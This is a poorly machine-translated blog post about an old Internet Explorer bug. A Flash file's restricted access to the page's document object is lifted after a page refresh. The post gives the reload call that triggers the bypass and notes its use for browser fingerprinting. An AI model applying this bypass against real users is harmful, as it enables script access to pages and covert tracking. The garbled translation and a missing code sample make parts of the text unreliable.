A bug in IE that restricts flash access to document objects

Author:Thorn

Although IE has been criticized, in some security aspects, IE is doing quite well.
For example, in IE, iframe Intercepts local cookies, and IE implements a security Attribute in iframe. None of these features are FF.

Today we see another security problem.
In the browser, If you directly access a swf file, the browser automatically addsEmbed label.

For example, directly accessing the http://www.fvck.com/svck.swf
So,
ForFF (Firefox 3.0.3 test), The page source code is:

<embed height="100%" width="100%" name="plugin" src="http://www.fvck.com/svck.swf" type="application/x-shockwave-flash"/>

ForIE (IE7 test), Will be called automaticallyRes: // mshtml. dll/objectembed_neutral.jsTo generate a page. The page code is

Note that none of the embed labels of these two pages are set.AllowScriptAccessAttribute Value.

InAfter Flash 8, The default value of allowScriptAccess isSameDomainMy flash version is9.0.124So here it should also be samedomain. in other words, svck.swf can access the js and DOM objects in the current html.

In IE, I think that the automatically generated page is not safe, so IE does one thing:Restrict this flash to access the document Object of the current window

This is good, but IE actually has such a bug (in IE6/IE7/IE8 Betas ):

After refreshing the page, the document Object originally restricted access can be accessed!

After refreshing the page with simple F5:

Firefox is even worse, with no restrictions from the very beginning

So how can we use this feature, or a bug?

In the flash as script, directly call

Window. location. reload ();

Refresh the current page to access the document object on the current page.

Here, you can also capture exceptions accessing docuemnt in AS to determine whether the browser is IE, which is also a fingerprint.

The original version of the Bug discoverer is inHere